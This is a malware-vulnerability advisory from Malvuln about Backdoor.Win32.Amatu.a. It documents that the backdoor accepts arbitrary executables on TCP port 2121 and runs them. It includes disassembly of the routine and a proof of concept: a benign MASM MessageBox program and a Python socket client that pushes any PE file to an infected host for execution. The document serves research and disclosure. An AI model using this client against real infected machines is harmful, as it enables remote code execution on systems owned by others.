Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/1e2d0b90ffc23e00b743c41064bdcc6b.txt
Contact: malvuln13@gmail.com
Media: x.com/malvuln  

Threat: Backdoor.Win32.Amatu.a
Vulnerability: Remote Arbitrary File Write (RCE)
Family: Amatu
Type: PE32
MD5: 1e2d0b90ffc23e00b743c41064bdcc6b
SHA256: 77fff9931013ab4de6d4be66ca4fda47be37b6f706a7062430ee8133c7521297
Vuln ID: MVID-2024-0698
Dropped files: mine.exe
Disclosure: 09/27/2024
Description: The malware listens on TCP port 2121. Third-party adversaries who can reach an infected host, can write arbitrary executable code to a file named "mine.exe" to SysWOW64 directory. The mine.exe  PE file executes immediately and runs as a child of the parent process malware. Amatu calls several Win32 APIs "GetSystemDirectoryA", "CreateFileA" and "WriteFile" to save the inbound code to disk. Finally, it calls "ShellExecuteA" executing the arbitrary PE file sent by the attacker. Setup a gateway and fake DNS sinkhole to mimic outbound internet access for the C2 or the port may not open.

"Amatu.a" disassembly

call    ds:GetSystemDirectoryA
004A1FCB                 lea     ecx, [ebp+Source]
004A1FD1                 push    ecx             ; Source
004A1FD2                 lea     edx, [ebp+Buffer]
004A1FD8                 push    edx             ; Destination
004A1FD9                 call    strcat
004A1FDE                 add     esp, 8
004A1FE1                 push    offset aMine    ; "mine"
004A1FE6                 lea     eax, [ebp+Buffer]
004A1FEC                 push    eax             ; Destination
004A1FED                 call    strcat
004A1FF2                 add     esp, 8
004A1FF5                 push    offset aExe     ; ".exe"
004A1FFA                 lea     ecx, [ebp+Buffer]
004A2000                 push    ecx             ; Destination
004A2001                 call    strcat

004A2022                 call    ds:CreateFileA
 
004A206B                 call    recv
.004A2070                 mov     [ebp+nNumberOfBytesToWrite], eax
.004A2076                 cmp     [ebp+nNumberOfBytesToWrite], 0

push    eax             ; lpNumberOfBytesWritten
004A209C                 mov     ecx, [ebp+nNumberOfBytesToWrite]
004A20A2                 push    ecx             ; nNumberOfBytesToWrite
004A20A3                 lea     edx, [ebp+buf]
004A20A9                 push    edx             ; lpBuffer
004A20AA                 mov     eax, [ebp+hFile]
004A20B0                 push    eax             ; hFile
004A20B1                 call    ds:WriteFile

mov     ecx, [ebp+hFile]
004A20BF                 push    ecx             ; hObject
004A20C0                 call    ds:CloseHandle
004A20C6                 push    1               ; nShowCmd
004A20C8                 push    0               ; lpDirectory
004A20CA                 push    0               ; lpParameters
004A20CC                 lea     edx, [ebp+Buffer]
004A20D2                 push    edx             ; lpFile
004A20D3                 push    offset Operation ; "open"
004A20D8                 push    0               ; hwnd
004A20DA                 call    ds:ShellExecuteA
004A20E0                 mov     eax, [ebp+s]
004A20E3                 push    eax             ; s
004A20E4                 call    closesocket


Exploit/PoC:
1) Create a small PE file named "mine.exe", I used MASM and packed it with FSG.

"mine.exe" 

include \masm32\include\masm32rt.inc
.data
HATE db "Masm32:", 0
MyReal8 REAL8 123.456
.data?
aDword dd ?
.code
start:
  invoke MessageBox, 0, chr$("DOOM!"), addr HATE, MB_OK
  mov eax, 123
  exit
end start

2) Our custom client to send "mine.exe" to the remote infected host.

from socket import *

MALWARE_HOST="x.x.x.x"
PORT=2121
DOOM="mine.exe" 

def doit():
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    f = open(DOOM, "rb")
    EXE = f.read()
    s.send(EXE)

    while EXE:
        s.send(EXE)
        EXE=f.read()

    s.close()

    print("By Malvuln");

if __name__=="__main__":
    doit()


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).